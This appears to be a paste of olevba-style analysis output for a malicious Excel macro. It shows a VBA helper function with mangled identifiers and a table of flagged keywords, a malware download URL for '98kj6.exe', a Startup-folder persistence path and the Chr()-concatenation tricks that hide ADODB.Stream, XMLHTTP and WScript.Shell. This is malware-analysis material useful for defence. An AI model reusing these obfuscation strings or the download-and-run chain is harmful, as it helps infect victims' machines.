  781. '! Description (Iienaiea)  :   [type_description_here]
  782. '! Parameters  (Ia?aiaiiua):   StrPathFile (String)
  783. '                              strSection (String)
  784. '                              strParam (String)
  785. '                              strDefValue (String)
  786. '!--------------------------------------------------------------------------------
  787. Public Function LocaliseString(ByVal strPathFile As String, ByVal strSection As String, ByVal strParam As String, ByVal strDefValue As String) As String
  788.  
  789.     Dim strTemp As String
  790.  
  791.     strTemp = Trim$(IniSt.ringPrivate(strSection, strParam, strPathFile))
  792.  
  793.     If StrComp(strTemp, "no_key") <> 0 Then
  794.         LocaliseString = Conve.rtString(strTemp)
  795.     Else
  796.         LocaliseString = strDefValue
  797.     End If
  798.  
  799. End Function
  800.  
  801.  
  802. +------------+----------------------+-----------------------------------------+
  803. | Type       | Keyword              | Description                             |
  804. +------------+----------------------+-----------------------------------------+
  805. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  806. | Suspicious | Open                 | May open a file                         |
  807. | Suspicious | Shell                | May run an executable file or a system  |
  808. |            |                      | command                                 |
  809. | Suspicious | Windows              | May enumerate application windows (if   |
  810. |            |                      | combined with Shell.Application object) |
  811. | Suspicious | RegOpenKeyEx         | May read or write registry keys         |
  812. | Suspicious | CreateObject         | May create an OLE object                |
  813. | Suspicious | sample               | May detect Anubis Sandbox               |
  814. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  815. |            |                      | strings                                 |
  816. | Suspicious | SaveToFile           | May create a text file                  |
  817. | Suspicious | Environ              | May read system environment variables   |
  818. | Suspicious | Write                | May write to a file (if combined with   |
  819. |            |                      | Open)                                   |
  820. | Suspicious | Output               | May write to a file (if combined with   |
  821. |            |                      | Open)                                   |
  822. | Suspicious | Print #              | May write to a file (if combined with   |
  823. |            |                      | Open)                                   |
  824. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  825. |            |                      | be used to obfuscate strings (option    |
  826. |            |                      | --decode to see all)                    |
  827. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  828. |            |                      | may be used to obfuscate strings        |
  829. |            |                      | (option --decode to see all)            |
  830. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  831. |            | Strings              | may be used to obfuscate strings        |
  832. |            |                      | (option --decode to see all)            |
  833. | IOC        | http://alarmtechcent | URL (obfuscation: VBA expression)       |
  834. |            | ral.com/fw43t2d/98kj |                                         |
  835. |            | 6.exe                |                                         |
  836. | IOC        | 98kj6.exe            | Executable file name (obfuscation: VBA  |
  837. |            |                      | expression)                             |
  838. | VBA string | Ad(odb*.)Strea+m     | (Chr(65) & Chr(100) + "(" & Chr(111) &  |
  839. |            |                      | Chr(100) & "b*" & Chr(46) & ")S" &      |
  840. |            |                      | Chr(116) & Chr(114) & Chr(101) &        |
  841. |            |                      | Chr(97) & "+m")                         |
  842. | VBA string | M++i(cr)o            | Chr(77) & "++" + Chr(105) & "(cr)" &    |
  843. |            |                      | Chr(111)                                |
  844. | VBA string | oft.*XML*HTTP        | Chr(100 + 11) & Chr(102) & "t" &        |
  845. |            |                      | Chr(46) & "*X" & Chr(77) & Chr(76) &    |
  846. |            |                      | "*H" & Chr(84) & "TP"                   |
  847. | VBA string | http://alarmtechcent | Chr(104) & "t" & "t" & Chr(112) &       |
  848. |            | ral.com/fw43t2d/98kj | Chr(58) & Chr(47) & Chr(47) & Chr(97) & |
  849. |            | 6.exe                | "l" & Chr(97) & Chr(114) & Chr(109) &   |
  850. |            |                      | Chr(116) & Chr(101) & Chr(99) & "h" &   |
  851. |            |                      | Chr(99) & Chr(101) & Chr(110) & "t" &   |
  852. |            |                      | "r" & "a" & Chr(108) & "." & Chr(99) &  |
  853. |            |                      | Chr(111) & Chr(109) & "/" & "f" & "w" & |
  854. |            |                      | Chr(52) & "3" & "t" & "2" & Chr(100) &  |
  855. |            |                      | "/" & Chr(57) & "8" & Chr(107) & "j" &  |
  856. |            |                      | "6" & Chr(46) & Chr(101) & Chr(120) &   |
  857. |            |                      | "e"                                     |
  858. | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start                  |
  859. |            | Programs\Startup     | Menu\Programs\Startup"                  |
  860. | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start                  |
  861. |            | Programs\Startup\    | Menu\Programs\Startup\"                 |
  862. | VBA string | GET                  | Chr(71) & Chr(69) & "T"                 |
  863. | VBA string | She(l)+l+.A*pp(l)ica | ("Sh" & Chr(101) & "(l)" & "+l+" &      |
  864. |            | +ti()on              | Chr(46) & Chr(65) & "*p" & Chr(112) &   |
  865. |            |                      | "(l)" & Chr(105) & Chr(99) & "a+t" +    |
  866. |            |                      | Chr(105) & "()" & Chr(111) + Chr(110))  |
  867. | VBA string | W(S+c)ri*pt.Shel))l  | (Chr(87) & "(S+c)" & Chr(114) &         |
  868. |            |                      | Chr(105) & "*p" & Chr(116) & Chr(46) &  |
  869. |            |                      | Chr(83) & Chr(104) & Chr(101) &         |
  870. |            |                      | Chr(108) & "))l")                       |
  871. | VBA string | Process              | (Chr(80) & "r" & Chr(111) & Chr(99) &   |
  872. |            |                      | Chr(101) & Chr(115) & Chr(115))         |
  873. | VBA string | TEMP\kah78d          | (Chr(84) & "E" & Chr(77) & Chr(80)) +   |
  874. |            |                      | "\ka" & Chr(104) + "78d"                |
  875. +------------+----------------------+-----------------------------------------+
RAW Paste Data